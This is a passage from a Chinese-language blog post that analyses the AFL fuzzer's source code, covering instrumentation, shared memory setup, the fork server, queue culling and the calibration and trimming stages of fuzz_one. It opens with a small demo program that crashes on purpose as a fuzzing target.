small\n"</span>);<br>}<br>}<br><span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (<span class="hljs-built_in">strcmp</span>(input, <span class="hljs-string">"surprise!\n"</span>) == <span class="hljs-number">0</span>)<br>{<br><span class="hljs-comment">// easter egg!</span><br>*(<span class="hljs-type">char</span> *)<span class="hljs-number">1</span> = <span class="hljs-number">2</span>;<br>}<br><span class="hljs-keyword">else</span><br>{<br><span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br>}<br><span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br><br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">main</span><span class="hljs-params">(<span class="hljs-type">int</span> argc, <span class="hljs-type">char</span> *argv[])</span></span><br><span class="hljs-function"></span>{<br><span class="hljs-type">char</span> *usage = <span class="hljs-string">"Usage: %s\n"</span><br> <span class="hljs-string">"Text utility - accepts commands and data on stdin and prints results to stdout.\n"</span><br> <span class="hljs-string">"\tInput | Output\n"</span><br> <span class="hljs-string">"\t------------------+-----------------------\n"</span><br> <span class="hljs-string">"\tu <N> <string> | Uppercased version of the first <N> bytes of <string>.\n"</span><br> <span class="hljs-string">"\thead <N> <string> | The first <N> bytes of <string>.\n"</span>;<br><span class="hljs-type">char</span> input[INPUTSIZE] = {<span class="hljs-number">0</span>};<br><br><span class="hljs-comment">// Slurp input</span><br><span class="hljs-keyword">if</span> (<span class="hljs-built_in">read</span>(STDIN_FILENO, input, INPUTSIZE) < <span class="hljs-number">0</span>)<br>{<br><span class="hljs-built_in">fprintf</span>(stderr, <span class="hljs-string">"Couldn't read stdin.\n"</span>);<br>}<br><br><span class="hljs-type">int</span> ret = <span class="hljs-built_in">process</span>(input);<br><span class="hljs-keyword">if</span> (ret)<br>{<br><span class="hljs-built_in">fprintf</span>(stderr, usage, argv[<span class="hljs-number">0</span>]);<br>};<br><span class="hljs-keyword">return</span> ret;<br>}<br></code></pre></td></tr></table></figure><p>很显然,只要输出指定字符串,程序就会访问到非法内存,同时程序根据输入头部的不同产生多个分支,从而测试AFL输入样本的变异过程</p><p><img src="/image-20220429215246469.png"></p><p>因为分支和跳转较多,程序显示对52处位置进行了插桩</p><p><img src="/image-20220429215913971.png"></p><p>把编译得到的文件丢进IDA,可以发现编译生成的函数中有多个<code>__afl_maybe_log</code>,显然他们由afl-gcc的插桩产生。观察这些位置就会发现它们基本都处于输入输出、函数入口、内存操作处。</p><p>同理,如果使用afl-clang-fast编译,同样产生了新的函数<code>__sanitizer_cov_trace_pc_guard</code>,具体原理之后我会结合源码分析。</p><p><img src="/image-20220429204941067.png"></p><h1 id="Fuzz-target"><a href="#Fuzz-target" class="headerlink" title="Fuzz target"></a>Fuzz target</h1><p>源代码比较长,我就挑了几个重要函数的源码进行分析</p><h2 id="初始化"><a href="#初始化" class="headerlink" title="初始化"></a>初始化</h2><p>进入main函数,首先获取时间,循环读取参数</p><figure class="highlight mel"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs mel">gettimeofday(&tv, &tz);<br> srandom(tv.tv_sec ^ tv.tv_usec ^ <span class="hljs-keyword">getpid</span>());<br><br> <span class="hljs-keyword">while</span> ((opt = getopt(argc, argv, <span class="hljs-string">"+i:o:f:m:t:T:dnCB:S:M:x:Q"</span>)) > <span class="hljs-number">0</span>)<br><br> <span class="hljs-keyword">switch</span> (opt) {<br><br> <span class="hljs-keyword">case</span> <span class="hljs-string">'i'</span>: <span class="hljs-comment">/* input dir */</span><br><br> <span class="hljs-keyword">if</span> (in_dir) FATAL(<span class="hljs-string">"Multiple -i options not supported"</span>);<br> in_dir = optarg;<br> …………<br></code></pre></td></tr></table></figure><p>下面接了一大堆目录处理和前期检查的函数</p><h2 id="setup-shm"><a href="#setup-shm" class="headerlink" title="setup_shm()"></a>setup_shm()</h2><p>该函数用于配置共享内存和virgin_bits</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs cpp">/s数组定义<br>EXP_ST u8 virgin_bits[MAP_SIZE], <span class="hljs-comment">/* Regions yet untouched by fuzzing */</span><br> virgin_tmout[MAP_SIZE], <span class="hljs-comment">/* Bits we haven't seen in tmouts */</span><br> virgin_crash[MAP_SIZE]; <span class="hljs-comment">/* Bits we haven't seen in crashes */</span><br><span class="hljs-function">EXP_ST <span class="hljs-type">void</span> <span class="hljs-title">setup_shm</span><span class="hljs-params">(<span class="hljs-type">void</span>)</span> </span>{<br>…………<br> <span class="hljs-keyword">if</span> (!in_bitmap) <span class="hljs-built_in">memset</span>(virgin_bits, <span class="hljs-number">255</span>, MAP_SIZE);<br> <span class="hljs-built_in">memset</span>(virgin_tmout, <span class="hljs-number">255</span>, MAP_SIZE);<br> <span class="hljs-built_in">memset</span>(virgin_crash, <span class="hljs-number">255</span>, MAP_SIZE);<br></code></pre></td></tr></table></figure><p>将三个状态数组全部初始化为255(0~65535)</p><ul><li>virgin_bits记录尚未覆盖的区域</li><li>virgin_tmout记录timeout时的tuple信息</li><li>virgin_crash记录crash时的tuple信息</li></ul><figure class="highlight mipsasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs mipsasm"> <span class="hljs-keyword">shm_id </span>= <span class="hljs-keyword">shmget(IPC_PRIVATE, </span>MAP_SIZE, IPC_CREAT <span class="hljs-title">| IPC_EXCL |</span> <span class="hljs-number">0600</span>);<br>…………<br> trace_bits = <span class="hljs-keyword">shmat(shm_id, </span>NULL, <span class="hljs-number">0</span>);<br></code></pre></td></tr></table></figure><p>int shmget(key_t key, size_t size, int shmflg)申请共享大小为65536的共享内存</p><ul><li>第一参数为 IPC_PRIVATE,<em>使用IPC_PRIVATE创建的IPC对象, key值属性为0,和IPC对象的编号就没有了对应关系。这样毫无关系的进程,就不能通过key值来得到IPC对象的编号(因为这种方式创建的IPC对象的key值都是0)。因此,这种方式产生的IPC对象,和无名管道类似,不能用于毫无关系的进程间通信。但也不是一点用处都没有,仍然可以用于有亲缘关系的进程间通信。</em></li><li>第二参数 MAP_SIZE 为65536,是这一段内存的大小。</li><li>第三参数 IPC_CREAT | IPC_EXCL | 0600,代表这段内存的权限<ul><li>0600权限代表,只有创建者可以进行读写</li><li>IPC_CREAT 如果共享内存不存在,则创建一个共享内存,否则打开操作。</li><li>IPC_EXCL 只有在共享内存不存在的时候,新的共享内存才建立,否则就产生错误。</li></ul></li></ul><p>void *shmat(int shm_id, const void *shm_addr, int shmflg) 访问共享内存</p><ul><li><p>第一参数指定这一段共享内存的id</p></li><li><p>第二参数为NULL一般,shm_addr指定共享内存连接到当前进程中的地址位置,通常为空,表示让系统来选择共享内存的地址。</p></li><li><p>第三参数shm_flg是一组标志位,通常为0。</p></li><li><p>返回一个指向共享内存起始位置的指针,存入trace_bits</p></li></ul><h2 id="Fork-Server"><a href="#Fork-Server" class="headerlink" title="Fork Server"></a>Fork Server</h2><p>调用链perform_dry_run(use_argv) -> calibrate_case(<em>argv</em>, q, use_mem, 0, 1) -> init_forkserver(argv) </p><p>perform_dry_run():每个测试用例都执行一次,仅对初始输入执行一次测试,以确保程序按预期运行</p><p>calibrate_case():校准一个新的测试用例,只在处理输入目录和发现新路径时执行</p><p>init_forkserver():用于初始化forkserver</p><ol><li><p>初始参数中st_pipe[2], ctl_pipe[2]分别为状态管道和控制管道</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs cpp"><span class="hljs-function">EXP_ST <span class="hljs-type">void</span> <span class="hljs-title">init_forkserver</span><span class="hljs-params">(<span class="hljs-type">char</span>** argv)</span> </span>{<br><br> <span class="hljs-type">static</span> <span class="hljs-keyword">struct</span> <span class="hljs-title class_">itimerval</span> it;<br> <span class="hljs-type">int</span> st_pipe[<span class="hljs-number">2</span>], ctl_pipe[<span class="hljs-number">2</span>];<br> <span class="hljs-type">int</span> status;<br> s32 rlen;<br></code></pre></td></tr></table></figure></li><li><p>接着fork出子进程forkserver并使其脱离主进程</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs awk">forksrv_pid = fork();<span class="hljs-regexp">//</span>子进程为forkserver<br> <br><span class="hljs-keyword">if</span> (forksrv_pid < <span class="hljs-number">0</span>) PFATAL(<span class="hljs-string">"fork() failed"</span>); <span class="hljs-regexp">//</span>fork失败<br> <br><span class="hljs-keyword">if</span> (!forksrv_pid) { <span class="hljs-regexp">//</span>forkserver执行<br> …………<br> setsid(); <span class="hljs-regexp">//</span>让子进程完全独立运行<br></code></pre></td></tr></table></figure></li><li><p>重定向forkserver的stdout、stderr到dev_null_fd</p><figure class="highlight scss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><code class="hljs scss"><span class="hljs-built_in">dup2</span>(dev_null_fd, <span class="hljs-number">1</span>);<br><span class="hljs-built_in">dup2</span>(dev_null_fd, <span class="hljs-number">2</span>);<br>if (out_file) {<br> <span class="hljs-built_in">dup2</span>(dev_null_fd, <span class="hljs-number">0</span>);<br>} else {<br> <span class="hljs-built_in">dup2</span>(out_fd, <span class="hljs-number">0</span>);<br> <span class="hljs-built_in">close</span>(out_fd);<br>}<br>if (dup2(ctl_pipe[<span class="hljs-number">0</span>], FORKSRV_FD) < <span class="hljs-number">0</span>) <span class="hljs-built_in">PFATAL</span>("dup2() failed");<br>if (dup2(st_pipe[<span class="hljs-number">1</span>], FORKSRV_FD + <span class="hljs-number">1</span>) < <span class="hljs-number">0</span>) <span class="hljs-built_in">PFATAL</span>("dup2() failed");<br></code></pre></td></tr></table></figure><p>视情况重定向stdin</p><ul><li>若定义了out_file,则把stdin重定向到dev_null_fd</li><li>否则关闭out_fd(间接关闭了stdin)</li></ul><p>完成后对FORKSRV_FD和FORKSRV_FD + 1进行重定向</p><p><a href="https://blog.csdn.net/weixin_30764045/article/details/116936359">linux之dup和dup2函数解析</a></p></li><li><p>执行execv之前还有一系列参数设置,这里先略过,如果execv执行失败,那么主进程将通过trace_bits = EXEC_FAIL_SIG(位于bitmap)获得信息。</p><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs awk">execv(target_path, argv);<br> <br> /* Use a distinctive bitmap signature to tell the parent about execv()<br> falling through. */<br> <br> *(u32*)trace_bits = EXEC_FAIL_SIG;<br> <span class="hljs-keyword">exit</span>(<span class="hljs-number">0</span>);<br></code></pre></td></tr></table></figure></li><li><p>主进程的pipe为fsrv_ctl_fd = ctl_pipe[1]用于写;fsrv_st_fd = st_pipe[0]用于读; 设置完成后等待forkserver的返回状态信号</p><figure class="highlight sas"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs sas"><span class="hljs-comment">/* Close the unneeded endpoints. */</span><br><span class="hljs-meta">close</span>(ctl_pipe[0]);<br><span class="hljs-meta">close</span>(st_pipe[1]);<br> <br>fsrv_ctl_fd = ctl_pipe[1];<br>fsrv_st_fd = st_pipe[0];<br>//等待返回消息<br>it.it_value.tv_sec = ((exec_tmout <span class="hljs-comment">* FORK_WAIT_MULT) / 1000);</span><br>it.it_value.tv_usec = ((exec_tmout <span class="hljs-comment">* FORK_WAIT_MULT) % 1000) * 1000;</span><br> <br>setitimer(ITIMER_REAL, <span class="hljs-variable">&it</span>, <span class="hljs-keyword">NULL</span>);<br>rlen = read(fsrv_st_fd, <span class="hljs-variable">&status</span>, 4);<br><br>it.it_value.tv_sec = 0;<br>it.it_value.tv_usec = 0;<br>setitimer(ITIMER_REAL, <span class="hljs-variable">&it</span>, <span class="hljs-keyword">NULL</span>);<br><span class="hljs-keyword">if</span> (rlen == 4) {<br> OKF(<span class="hljs-string">"All right - fork server is up."</span>);<br> <span class="hljs-keyword">return</span>;<br>}<br></code></pre></td></tr></table></figure><ul><li>如果长度正好为4,一切正常,直接返回</li><li>否则分类处理异常信号,打印消息并退出</li></ul></li></ol><h2 id="fuzzing策略"><a href="#fuzzing策略" class="headerlink" title="fuzzing策略"></a>fuzzing策略</h2><p>各种初始设置完成后进入while循环,执行fuzzing主程序</p><p>先来看一个比较重要的数据结构<code>queue_entry</code>的特点</p><ul><li>存储输入样本</li><li>存储每次执行样本后的基本信息</li><li>链表连接</li></ul><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><code class="hljs awk">struct queue_entry {<br><br> u8* fname; <span class="hljs-regexp">/* File name for the test case */</span><br> u32 len; <span class="hljs-regexp">/* Input length */</span><br><br> u8 cal_failed, <span class="hljs-regexp">/* Calibration failed? */</span><br> trim_done, <span class="hljs-regexp">/* Trimmed? */</span><br> was_fuzzed, <span class="hljs-regexp">/* Had any fuzzing done yet? */</span><br> passed_det, <span class="hljs-regexp">/* Deterministic stages passed? */</span><br> has_new_cov, <span class="hljs-regexp">/* Triggers new coverage? */</span><br> var_behavior, <span class="hljs-regexp">/* Variable behavior? */</span><br> favored, <span class="hljs-regexp">/* Currently favored? */</span><br> fs_redundant; <span class="hljs-regexp">/* Marked as redundant in the fs? */</span><br><br> u32 bitmap_size, <span class="hljs-regexp">/* Number of bits set in bitmap */</span><br> exec_cksum; <span class="hljs-regexp">/* Checksum of the execution trace */</span><br><br> u64 exec_us, <span class="hljs-regexp">/* Execution time (us) */</span><br> handicap, <span class="hljs-regexp">/* Number of queue cycles behind */</span><br> depth; <span class="hljs-regexp">/* Path depth */</span><br><br> u8* trace_mini; <span class="hljs-regexp">/* Trace bytes, if kept */</span><br> u32 tc_ref; <span class="hljs-regexp">/* Trace bytes ref count */</span><br><br> struct queue_entry *<span class="hljs-keyword">next</span>, <span class="hljs-regexp">/* Next element, if any */</span><br> *next_100; <span class="hljs-regexp">/* 100 elements ahead */</span><br><br>};<br><br>static struct queue_entry *queue, <span class="hljs-regexp">/* Fuzzing queue (linked list) */</span><br> *queue_cur, <span class="hljs-regexp">/* Current offset within the queue */</span><br> *queue_top, <span class="hljs-regexp">/* Top of the list */</span><br> *q_prev100; <span class="hljs-regexp">/* Previous 100 marker */</span><br>static struct queue_entry*<br> top_rated[MAP_SIZE]; <span class="hljs-regexp">/* Top entries for bitmap bytes */</span><br></code></pre></td></tr></table></figure><p>其中top_rated里面存放的是bitmap中每个位置当前最短路径</p><h3 id="cull-queue"><a href="#cull-queue" class="headerlink" title="cull_queue()"></a>cull_queue()</h3><p>功能:每次执行fuzz_one之前,简化队列</p><ol><li><p>如果是dumb_mode或者score_changed为0(即上一次fuzz没有产生更好的路径),直接返回</p><figure class="highlight coq"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs coq"><span class="hljs-keyword">if</span> (dumb_mode |<span class="hljs-type">| !score_changed</span>) <span class="hljs-keyword">return</span>;<br></code></pre></td></tr></table></figure></li><li><p>遍历队列,还原favored设置</p><figure class="highlight abnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs abnf"><span class="hljs-attribute">q</span> <span class="hljs-operator">=</span> queue<span class="hljs-comment">;</span><br>while (q) {<br> q->favored <span class="hljs-operator">=</span> <span class="hljs-number">0</span><span class="hljs-comment">;</span><br> q <span class="hljs-operator">=</span> q->next<span class="hljs-comment">;</span><br>}<br></code></pre></td></tr></table></figure></li><li><p>循环取出处于top_rate中并且被temp_v标记的用例,每取出一个,清除temp_v中所有属于这个entry的bit,并设置它的favored位,令queued_favored,如果这个用例还没被fuzz过,令pending_favored++,标记优先执行</p><figure class="highlight xl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs xl"><span class="hljs-keyword">for</span> (i = <span class="hljs-number">0</span>; i < MAP_SIZE; i++)<br> <span class="hljs-keyword">if</span> (top_rated[i] && (temp_v[i >> <span class="hljs-number">3</span>] & (<span class="hljs-number">1</span> <span class="hljs-string"><< (i & 7)))) {</span><br><span class="hljs-string"> u32 j = MAP_SIZE >></span> <span class="hljs-number">3</span>;<br> <span class="hljs-keyword">while</span> (j--) <br> <span class="hljs-function"><span class="hljs-title">if</span> (top_rated[i]-></span>trace_mini[j])<br> <span class="hljs-function"><span class="hljs-title">temp_v</span>[j] &= ~top_rated[i]-></span>trace_mini[j];<br> <br> <span class="hljs-function"><span class="hljs-title">top_rated</span>[i]-></span>favored = <span class="hljs-number">1</span>;<br> queued_favored++;<br> <span class="hljs-function"><span class="hljs-title">if</span> (!top_rated[i]-></span>was_fuzzed) pending_favored++;<br> }<br></code></pre></td></tr></table></figure></li><li><p>简化队列,标记冗余项</p><figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs reasonml">q = queue;<br> <span class="hljs-keyword">while</span> (q) {<br> mark<span class="hljs-constructor">_as_redundant(<span class="hljs-params">q</span>, !<span class="hljs-params">q</span>-><span class="hljs-params">favored</span>)</span>;<br> q = q->next;<br> }<br></code></pre></td></tr></table></figure></li></ol><h3 id="if-queue-cur"><a href="#if-queue-cur" class="headerlink" title="if (!queue_cur)"></a>if (!queue_cur)</h3><p>功能:判断一次循环是否结束,是则初始化队列</p><p>queue_cur指向当前队列中元素,为空说明遍历到结尾</p><p>不为空则直接下一步</p><ol><li><p>记录轮数、重置状态</p> <figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">queue_cycle</span>++;<br> <span class="hljs-attribute">current_entry</span> = <span class="hljs-number">0</span>;<br> <span class="hljs-attribute">cur_skipped_paths</span> = <span class="hljs-number">0</span>;<br> <span class="hljs-attribute">queue_cur</span> = queue;<br></code></pre></td></tr></table></figure></li><li><p>seek_to的值来源于find_start_position(),找到fuzzer重启后的开始位置</p><figure class="highlight lua"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs lua"><span class="hljs-keyword">while</span> (seek_to) {<br> current_entry++;<br> seek_to<span class="hljs-comment">--;</span><br> queue_cur = queue_cur-><span class="hljs-built_in">next</span>;<br>}<br></code></pre></td></tr></table></figure><p>(只在fuzzer重启的第一个循环里用到)这里把queue_cur抬高到seek_to位置,恢复重启前的状态</p></li><li><p>展示状态,就是命令行面板,每次状态更新或在其他状况下就会调用一次</p><figure class="highlight scss"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs scss"><span class="hljs-built_in">show_stats</span>();<br></code></pre></td></tr></table></figure></li><li><p>非终端模式下输出循环数</p><figure class="highlight scss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs scss">if (not_on_tty) {<br> <span class="hljs-built_in">ACTF</span>("Entering queue cycle %llu.", queue_cycle);<br> <span class="hljs-built_in">fflush</span>(stdout);<br> }<br></code></pre></td></tr></table></figure></li><li><p>queue_path不变,说明一整个循环未发现新路径,设置cycles_wo_finds+1或者use_splicing=1,他注释说会更换策略,但如果设置了-d参数,其实本来用的就是splicing,直接计数就行,cycles_wo_finds只是根据它的数量判断现在是否可以结束fuzzing,没别的影响</p><figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs nginx"><span class="hljs-attribute">if</span> (queued_paths == prev_queued) {<br><br> <span class="hljs-attribute">if</span> (use_splicing) cycles_wo_finds++; <span class="hljs-attribute">else</span> use_splicing = <span class="hljs-number">1</span>;<br><br> } <span class="hljs-attribute">else</span> cycles_wo_finds = <span class="hljs-number">0</span>;<br> <span class="hljs-attribute">prev_queued</span> = queued_paths;<br></code></pre></td></tr></table></figure></li><li><p>设置prev_queued为上一次的结果</p><figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ini"><span class="hljs-attr">prev_queued</span> = queued_paths<span class="hljs-comment">;</span><br></code></pre></td></tr></table></figure></li><li><p>如果设置了相关参数,sync_fuzzers()可以从其他fuzzer获取测试用例</p><figure class="highlight lisp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs lisp">if (<span class="hljs-name">sync_id</span> <span class="hljs-symbol">&&</span> queue_cycle == <span class="hljs-number">1</span> <span class="hljs-symbol">&&</span> getenv(<span class="hljs-string">"AFL_IMPORT_FIRST"</span>))<br> sync_fuzzers(<span class="hljs-name">use_argv</span>)<span class="hljs-comment">;</span><br></code></pre></td></tr></table></figure></li></ol><h3 id="关键执行函数fuzz-one"><a href="#关键执行函数fuzz-one" class="headerlink" title="关键执行函数fuzz_one()"></a><strong>关键执行函数fuzz_one()</strong></h3><figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ini"><span class="hljs-attr">skipped_fuzz</span> = fuzz_one(use_argv)<span class="hljs-comment">;</span><br></code></pre></td></tr></table></figure><p>终于到了最关键的地方</p><p>fuzz_one从当前队列中取一个用例执行</p><p>fuzz成功返回0,跳过或bailed out返回1</p><ol><li><p>进来先判断是否有<em>favored, non-fuzzed</em>用例需要执行</p><p>如果有,则有99%的概率跳过在它之前的用例</p><figure class="highlight coq"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs coq"><span class="hljs-keyword">if</span> (pending_favored){<br> <span class="hljs-keyword">if</span> ((queue_cur->was_fuzzed |<span class="hljs-type">| !queue_cur</span>->favored) &&<br> UR(<span class="hljs-number">100</span>) < SKIP_TO_NEW_PROB) <span class="hljs-keyword">return</span> <span class="hljs-number">1</span>;<br>}<br></code></pre></td></tr></table></figure></li><li><p>即使没有需要优先fuzz的用例,非dumb_mode下,当前用例不是favored,队列中超过10个元素的情况下:</p><ul><li>当前已运行超过2轮,未被fuzz过的,跳过概率75%(就是说第一二次循环就会跳过很大一部分,这是由于perform_dry_run里已经跑过一轮测试了)</li><li>否则,跳过概率95%</li></ul><figure class="highlight sas"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs sas"><span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (!dumb_mode <span class="hljs-variable">&&</span> !queue_cur->favored <span class="hljs-variable">&&</span> queued_paths > 10) {<br> <span class="hljs-keyword">if</span> (queue_cycle > 1 <span class="hljs-variable">&&</span> !queue_cur->was_fuzzed) {<br> <span class="hljs-keyword">if</span> (UR(100) < SKIP_NFAV_NEW_PROB) <span class="hljs-keyword">return</span> 1;<br> } <span class="hljs-keyword">else</span> {<br> <span class="hljs-keyword">if</span> (UR(100) < SKIP_NFAV_OLD_PROB) <span class="hljs-keyword">return</span> 1;<br> }<br> }<br></code></pre></td></tr></table></figure></li><li><p>直接把当前测试用例映射到内存,提高效率</p><figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ini"><span class="hljs-attr">orig_in</span> = in_buf = mmap(<span class="hljs-number">0</span>, len, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, <span class="hljs-number">0</span>)<span class="hljs-comment">;</span><br></code></pre></td></tr></table></figure></li><li><p>out_buf不是从文件读,这里相当于直接用了malloc(len+1),即使mmap也不能提高效率</p><figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ini"><span class="hljs-attr">out_buf</span> = ck_alloc_nozero(len)<span class="hljs-comment">;</span><br></code></pre></td></tr></table></figure></li></ol><h3 id="fuzz-one-CALIBRATION"><a href="#fuzz-one-CALIBRATION" class="headerlink" title="fuzz_one CALIBRATION"></a><strong>fuzz_one CALIBRATION</strong></h3><figure class="highlight xl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs xl"><span class="hljs-function"><span class="hljs-title">if</span> (queue_cur-></span>cal_failed)<br></code></pre></td></tr></table></figure><p>只有存在cal_failed被标记才会执行</p><p>cal_failed在<code>calibrate_case()</code>中,发生以下情况会+1</p><ul><li>若测试时发生crash_mode(-C设置crash_mode为2,否则为0?)以外的fault</li><li>非dumb_mode,且第一次测试运行后trace_bits为空</li></ul><p>同时afl允许我们通过设置,即使发生上述情况,也不在此阶段执行CALIBRATION(通过令cal_failed=3)</p><p>该判定位于<code>perform_dry_run()</code></p><ul><li>设置timeout_given =2,则忽略FAULT_TMOUT</li><li>未设置crash_mode时,设置环境变量AFL_SKIP_CRASHES为1,忽略FAULT_CRASH</li></ul><figure class="highlight abnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs abnf">if (cal_failures <span class="hljs-operator">=</span><span class="hljs-operator">=</span> queued_paths)<br>if (cal_failures * <span class="hljs-number">5</span> > queued_paths)<br></code></pre></td></tr></table></figure><p>然而,出现上述问题会使cal_failures++,若报错比例过高,就会要求你检查设置</p><p>回到fuzz_one,若校准错误小于3</p><figure class="highlight reasonml"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs reasonml">res = calibrate<span class="hljs-constructor">_case(<span class="hljs-params">argv</span>, <span class="hljs-params">queue_cur</span>, <span class="hljs-params">in_buf</span>, <span class="hljs-params">queue_cycle</span> - 1, 0)</span>;<br></code></pre></td></tr></table></figure><p>让存在校准问题的用例再次校准</p><ul><li>出现FAULT_ERROR,说明无法运行,直接放弃抢救,报错</li><li>出现crash_mode,接着往下运行</li><li>其他任何情况都跳过,cur_skipped_paths++</li></ul><h3 id="fuzz-one-TRIMMING"><a href="#fuzz-one-TRIMMING" class="headerlink" title="fuzz_one TRIMMING"></a>fuzz_one TRIMMING</h3><figure class="highlight xl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs xl"><span class="hljs-function"><span class="hljs-title">if</span> (!dumb_mode && !queue_cur-></span>trim_done){<br> u8 res = trim_case(argv, queue_cur, in_buf);<br> …………<br> <span class="hljs-function"><span class="hljs-title">queue_cur</span>-></span>trim_done = <span class="hljs-number">1</span>;<br> <span class="hljs-function"><span class="hljs-title">if</span> (len != queue_cur-></span><span class="hljs-function"><span class="hljs-title">len</span>) len = queue_cur-></span>len;<br>}<br>memcpy(out_buf, in_buf, len);<br></code></pre></td></tr></table></figure><p>非dumb_mode且该case尚未trim时执行</p><p>最后结果存储在out_buf</p><p><code>trim_case(char** argv, struct 